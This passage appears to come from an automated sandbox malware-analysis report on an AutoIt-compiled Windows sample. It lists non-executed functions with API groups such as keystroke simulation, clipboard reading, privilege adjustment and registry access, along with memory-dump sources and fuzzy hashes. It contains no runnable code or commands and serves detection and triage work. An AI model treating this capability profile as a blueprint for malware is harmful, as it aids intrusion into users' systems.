                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 4292702814-0
                                                                          • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                          • Instruction ID: e6efc8c4c5360390c15f5c0a5e1b7bdbb4839e46be25ff0e202264d2d0a59810
                                                                          • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                          • Instruction Fuzzy Hash: 34F03A40A4F3468DFE19B7615A0127CD190DF84BA0FCA5230D82E852E1FEACE452B230

                                                                          Non-executed Functions

                                                                          Function 00007FF7ADC956A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                          • API String ID: 2211948467-2373415609
                                                                          • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                          • Instruction ID: 8f51ade3e5307d9a8d7adac7cd1f5b956cc5d4fbaacf0bbf577618217371f73d
                                                                          • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                          • Instruction Fuzzy Hash: E222BF36A1E6418AEB10EF25E854169B7A1FB88B94FD24135EE4E43B74EF3CD446CB10
                                                                          Function 00007FF7ADCACE8C Relevance: 69.5, APIs: 46, Instructions: 540windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                                          • String ID:
                                                                          • API String ID: 3481653762-0
                                                                          • Opcode ID: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                          • Instruction ID: 22c98b4c4207acab50b7e3a237dfd281099fe96dad2a4e3eda4d87379cbd92c9
                                                                          • Opcode Fuzzy Hash: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                          • Instruction Fuzzy Hash: 4532AF36A1E6818AE750EF25D4447A9A7A1FB84B84FC14531DA4E43BB8EF3CE447CB10
                                                                          Function 00007FF7ADCABA0C Relevance: 54.8, APIs: 30, Strings: 1, Instructions: 500windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                                          • String ID: %d/%02d/%02d
                                                                          • API String ID: 1218376639-328681919
                                                                          • Opcode ID: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
                                                                          • Instruction ID: 4c026e9d85dc26303c504683eb60430b0ece38003dbfe3fdc79fab5a6231f9d8
                                                                          • Opcode Fuzzy Hash: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
                                                                          • Instruction Fuzzy Hash: 1512F336B1E6428AFB50AB2599546BDA3A2EB84B94FC24531DE1D43BF5EF3CD4038710
                                                                          Function 00007FF7ADCADB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                          • String ID: P
                                                                          • API String ID: 1208186926-3110715001
                                                                          • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                          • Instruction ID: a687d55601e1588b5590fce4c28be0cfffc381a2c4f217e45cc78b4cc23360cd
                                                                          • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                          • Instruction Fuzzy Hash: BD122772B1D6928AE7249B25D4547BEA7A1FB45B84FC10935EA0D03AB0FF3CE442C750
                                                                          Function 00007FF7ADC24514 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 3778422247-2988720461
                                                                          • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                          • Instruction ID: 3d729e19dab35ae375a4cfaa8eaa82e401610c4dc55eaedf6aac3dfe5bb1c11a
                                                                          • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                          • Instruction Fuzzy Hash: DE418721F1D6124BFB546B25A91463AA292FF8CF81FD65031C90A47B74FE3DE84B8710
                                                                          Function 00007FF7ADC6CE68 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                          • String ID: default$winsta0$winsta0\default
                                                                          • API String ID: 3202303201-1423368268
                                                                          • Opcode ID: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                                          • Instruction ID: f68b15a0e33263e96762a9d6fef3ac01e7cefbfe1197268bf972da92a1f9e34c
                                                                          • Opcode Fuzzy Hash: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                                          • Instruction Fuzzy Hash: 19A16172B1DB418AEB10EF61E4402A9A7A1FB85B94FC51135DE5D47BA8EF3CE006C750
                                                                          Function 00007FF7ADC02AE0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                          • String ID: AutoIt v3 GUI
                                                                          • API String ID: 1458621304-248962490
                                                                          • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                          • Instruction ID: 1038f4ad76dc18a3203ca42acb703fd4745a2455e85df607ff3ba2bd5bc41458
                                                                          • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                          • Instruction Fuzzy Hash: D7D17172A096428EE754EF39D8547ADB7A1FB48B48FD10135DA0E436A4EF3CE846C750
                                                                          Function 00007FF7ADC90A6C Relevance: 30.2, APIs: 20, Instructions: 169clipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                          • String ID:
                                                                          • API String ID: 3222323430-0
                                                                          • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                          • Instruction ID: bd5aaddc6cd51b7bbe5fbc51a9943b725c725d6218e4719170186716261d7fc0
                                                                          • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                          • Instruction Fuzzy Hash: 32715B21B1EA529AEB14BB65D45427CA361FF84B85FC24035DA0E436B1FE3CEA078761
                                                                          Function 00007FF7ADCAC6D4 Relevance: 28.9, APIs: 19, Instructions: 396windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                          • String ID:
                                                                          • API String ID: 1015379403-0
                                                                          • Opcode ID: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                                          • Instruction ID: d8ee5595795f3b753f00574e86e1fd48b6b3d9b7124ba5742567be0da6950444
                                                                          • Opcode Fuzzy Hash: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                                          • Instruction Fuzzy Hash: DF020635A0E68289EB60AF21D6442B9A762FB84794FC24631DA5D07BF4EF3CE543C710
                                                                          Function 00007FF7ADC9206C Relevance: 27.1, APIs: 18, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                          • String ID:
                                                                          • API String ID: 3215588206-0
                                                                          • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                          • Instruction ID: f7ce3098c68e5fa7e3770733b194007c401a118a9baebcc482c2702a47d87cf6
                                                                          • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                          • Instruction Fuzzy Hash: 50518F32B1EB428EEB84EF64E41817D73A1FB48745F914439EA0E837A4EE7CE4168314
                                                                          Function 00007FF7ADCA0AEC Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 388registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValue$ConnectCreateRegistry
                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                          • API String ID: 3314541760-966354055
                                                                          • Opcode ID: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                                          • Instruction ID: ccf5a1b7ca676821337e3778114161a0fd963ad6bc0c76285fbf17712a27d186
                                                                          • Opcode Fuzzy Hash: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                                          • Instruction Fuzzy Hash: 09027F26B0DA5289EB10EF65D4902ADB760FB88FC8FC65431DE4D47766EE38E542C350
                                                                          Function 00007FF7ADC05F3C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: P
                                                                          • API String ID: 0-3110715001
                                                                          • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                          • Instruction ID: 5f496e13632feda719d5f309e1b847508292137e154f959938500cad7c6a0d0d
                                                                          • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                          • Instruction Fuzzy Hash: E8A1B472A0E6418AF724EF25D4182AAF761FB44784FD28135DA5E03AB4EF7CE546CB10
                                                                          Function 00007FF7ADC42400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                          • String ID: -$:$:$?
                                                                          • API String ID: 3440502458-92861585
                                                                          • Opcode ID: 29640cefbc64bb20a6448e512a44a74645684bd6d76422271cad1a6b858f5664
                                                                          • Instruction ID: 9b0906a89b338d6b0c88ac681dcd2a458d3ea2222e549538b5a95ea0cc81038c
                                                                          • Opcode Fuzzy Hash: 29640cefbc64bb20a6448e512a44a74645684bd6d76422271cad1a6b858f5664
                                                                          • Instruction Fuzzy Hash: D3E1F4B6A0D2428DE724AF31D8495B9FB52FB84788FC65135EA4D436A5FE3CD4438720
                                                                          Function 00007FF7ADC88BF4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                          • String ID: *.*
                                                                          • API String ID: 1111067124-438819550
                                                                          • Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                          • Instruction ID: 4f8081e16b56715b8ffb0741bcdff3569a042e65ad57d66a3f0a37fa8b2d191b
                                                                          • Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                          • Instruction Fuzzy Hash: 04716E3261DB8689DB10EF11E8405EEA361FB84B84FC15032EA4D47B75EF39E646C750
                                                                          Function 00007FF7ADC8A350 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 112fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 1409584000-438819550
                                                                          • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                          • Instruction ID: 20bb6ea4eda57e6c8d9a70261dea39e518f98045af9cfb8e3305d01e744cfbd4
                                                                          • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                          • Instruction Fuzzy Hash: E3418021A1E64258EB40AB15E8546B9E3A0FB84BA5FC65131DD6D436B4FF3CD50BC720
                                                                          Function 00007FF7ADC8A4F8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*
                                                                          • API String ID: 2640511053-438819550
                                                                          • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                          • Instruction ID: dc02800b959b7b55b559174815e10a1711febc929a0068205352c4bc93110eb5
                                                                          • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
